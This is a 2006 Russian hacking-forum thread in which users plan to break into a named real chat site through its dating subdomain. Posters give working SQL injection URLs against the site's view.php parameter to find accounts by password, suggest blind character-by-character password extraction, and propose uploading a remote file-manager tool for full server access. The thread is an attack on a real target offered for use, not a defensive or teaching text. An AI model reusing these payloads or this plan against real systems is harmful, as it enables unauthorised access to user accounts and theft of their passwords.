Форум АНТИЧАТ
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Чаты (https://forum.antichat.xyz/forumdisplay.php?f=10)
-   -   Ломаем чат бородина (https://forum.antichat.xyz/showthread.php?t=16984)

artkino 03.04.2006 18:01
Ломаем чат бородина
 
Еесть чат www.lifechat.ru как мы все знаем сломать чат на движке проблематично,но мы можем сломать этот чат через службу знакомств на этом же сервре где и чат вот ссылка на знакомства: http://dating.lifechat.ru/

seeattact 03.04.2006 18:24
и к чему ты это написал?

artkino 03.04.2006 18:27
Цитата:
Сообщение от seeattact
и к чему ты это написал?
А ктому что можно попробовать сломать....

seeattact 03.04.2006 18:36
Цитата:
Сообщение от artkino
А ктому что можно попробовать сломать....
ну вот и пробуй сам.как сломаеш напишеш.

censored! 03.04.2006 18:51
_http://dating.lifechat.ru/view.php?rand=1'
Но это уже не ко мне, а к ZaCo

k1b0rg 03.04.2006 19:08
зачем зако когда есть его замеситель =))))
http://dating.lifechat.ru/view.php?rand=99999999999+or+(pass=123)/*
выдаст юзера у кого пароль 123, проверил, все подходит.

http://dating.lifechat.ru/view.php?rand=99999999999+or+(id=442)+and(pass=123 )/*

если будешь перебирать все возможные пароли то ты получишь пароль от тестового аккаунта(он первый)? вдруг этот пароль еще куда нить подойдет, заметь пароли могут быть не только в цифромов виде, можешь еще помучаться с (ascii(substring(pass,0,1))<100
вообщем вариантов много, жалко union и select не пашут

artkino 03.04.2006 19:24
Цитата:
Сообщение от k1b0rg
зачем зако когда есть его замеситель =))))
http://dating.lifechat.ru/view.php?rand=99999999999+or+(pass=123)/*
выдаст юзера у кого пароль 123, проверил, все подходит.

http://dating.lifechat.ru/view.php?rand=99999999999+or+(id=442)+and(pass=123 )/*

если будешь перебирать все возможные пароли то ты получишь пароль от тестового аккаунта(он первый)? вдруг этот пароль еще куда нить подойдет, заметь пароли могут быть не только в цифромов виде, можешь еще помучаться с (ascii(substring(pass,0,1))<100
вообщем вариантов много, жалко union и select не пашут
Отлчино,а теперь можно попробовать взломать этот чат через сайт знакомств. Есть такая программа если ее залить на сервер то можно иметь полный доступ к серверу и чату: http://php.spb.ru/remview/

k1b0rg 03.04.2006 19:27
Цитата:
Сообщение от artkino
Отлчино,а теперь можно попробовать взломать этот чат через сайт знакомств. Есть такая программа если ее залить на сервер то можно иметь полный доступ к серверу и чату: http://php.spb.ru/remview/
ну нехера себе, где достал, она же приватная и стоит 500$ ты крут. научи пользоваться....
ты ниибацо крут, тебе надо ты и ломай, тебе дали уязвимость, показали как пользоваться, сиди и ломай, этот чат никому нах не нужен, тока себя потешить

artkino 03.04.2006 19:38
Цитата:
Сообщение от k1b0rg
ну нехера себе, где достал, она же приватная и стоит 500$ ты крут. научи пользоваться....
ты ниибацо крут, тебе надо ты и ломай, тебе дали уязвимость, показали как пользоваться, сиди и ломай, этот чат никому нах не нужен, тока себя потешить
Так вот давайте потешимся.

k1b0rg 03.04.2006 19:40
кому нуда уже все потешились, дальше что?


Время: 03:38
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице